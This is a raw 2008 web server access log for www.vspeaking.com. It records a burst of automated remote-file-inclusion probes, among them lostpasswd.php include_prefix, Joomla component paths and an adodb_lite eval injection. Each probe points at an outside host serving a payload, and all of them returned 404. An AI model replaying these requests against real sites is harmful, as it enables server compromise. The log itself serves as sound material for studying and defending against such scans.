80.67.20.101 - - [09/Nov/2008:16:20:32 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:20:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:20:33 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:20:35 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:20:35 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:20:35 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:20:35 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:20:55 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:20:55 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:20:55 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:21:09 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:21:09 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:21:09 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:21:21 -0800] "GET /logs/access_080721.log/config.php?path_to_root=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:21:21 -0800] "GET /logs/config.php?path_to_root=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:21:22 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:21:47 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:21:47 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:21:47 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:16:22:07 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:16:22:07 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:16:22:08 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:22:13 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:22:13 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:22:13 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
72.22.81.178 - - [09/Nov/2008:16:22:35 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:22:38 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:22:39 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:22:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:23:04 -0800] "GET /logs/scripts.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:16:23:14 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:23:47 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:23:47 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:23:48 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:24:06 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:24:06 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:24:07 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:16:25:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
210.143.111.146 - - [09/Nov/2008:16:25:41 -0800] "GET /logs/access.log/%22index.php?DOCUMENT_ROOT=%22http://www.zerodayexile.com/scan/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
210.143.111.146 - - [09/Nov/2008:16:25:41 -0800] "GET /%22index.php?DOCUMENT_ROOT=%22http://www.zerodayexile.com/scan/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
210.143.111.146 - - [09/Nov/2008:16:25:41 -0800] "GET /logs/%22index.php?DOCUMENT_ROOT=%22http://www.zerodayexile.com/scan/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:26:17 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:27:15 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:27:15 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:27:15 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:27:22 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:27:22 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:27:23 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:27:27 -0800] "GET /logs/access_080804.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:27:27 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:27:27 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:16:28:14 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:28:35 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:28:35 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:28:35 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:28:36 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:28:36 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:28:36 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:28:37 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:28:37 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:28:37 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:38 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:38 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:28:39 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:28:39 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:28:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
208.109.88.223 - - [09/Nov/2008:16:28:49 -0800] "GET /services.php?page=http://pisceanprophecy.com/vnc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
208.109.88.223 - - [09/Nov/2008:16:28:49 -0800] "GET /logs/services.php?page=http://pisceanprophecy.com/vnc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:49 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:50 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:28:50 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
208.109.88.223 - - [09/Nov/2008:16:28:55 -0800] "GET /logs/access.log%20%20/services.php?page=http://pisceanprophecy.com/vnc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:29:09 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:29:25 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:29:26 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:29:27 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:29:28 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:30:46 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:30:56 -0800] "GET /logs/access_080804.log/atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:30:56 -0800] "GET /atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:30:56 -0800] "GET /logs/atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:31:00 -0800] "GET /logs/access_080804.log/atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:31:00 -0800] "GET /atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
207.58.160.193 - - [09/Nov/2008:16:31:02 -0800] "GET /logs/atom.php5?page=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:32:18 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:32:21 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:32:23 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:33:21 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
208.109.88.223 - - [09/Nov/2008:16:33:21 -0800] "GET /logs/access.log/services.php?page=http://pisceanprophecy.com/vnc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:34:55 -0800] "GET /logs/access.log/rock/errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:35:04 -0800] "GET /rock/errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:35:06 -0800] "GET /logs/rock/errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.13.222.135 - - [09/Nov/2008:16:35:25 -0800] "GET /logs/access_080804.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://axioma-dch.com/servicios/FX29ID1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.13.222.135 - - [09/Nov/2008:16:35:25 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://axioma-dch.com/servicios/FX29ID1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:28 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:29 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:29 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:33 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:35 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
154.5.252.194 - - [09/Nov/2008:16:36:35 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.13.222.135 - - [09/Nov/2008:16:37:17 -0800] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://axioma-dch.com/servicios/FX29ID1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:43:16 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.58.164.77 - - [09/Nov/2008:16:44:47 -0800] "GET /logs/access.log/services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
207.58.164.77 - - [09/Nov/2008:16:44:52 -0800] "GET /logs/services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
219.85.63.226 - - [09/Nov/2008:16:44:53 -0800] "GET /logs/access.log%20%20/services.php?page=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
219.85.63.226 - - [09/Nov/2008:16:44:53 -0800] "GET /logs/services.php?page=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
207.58.164.77 - - [09/Nov/2008:16:44:54 -0800] "GET /services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
67.19.122.234 - - [09/Nov/2008:16:44:55 -0800] "GET /logs/access.log/services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.vspeaking.com"
67.19.122.234 - - [09/Nov/2008:16:44:55 -0800] "GET /services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.vspeaking.com"
67.19.122.234 - - [09/Nov/2008:16:44:55 -0800] "GET /logs/services.php?page=http://www.luzaclub.ru/McN/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:46:34 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:46:48 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.125.161.12 - - [09/Nov/2008:16:48:02 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
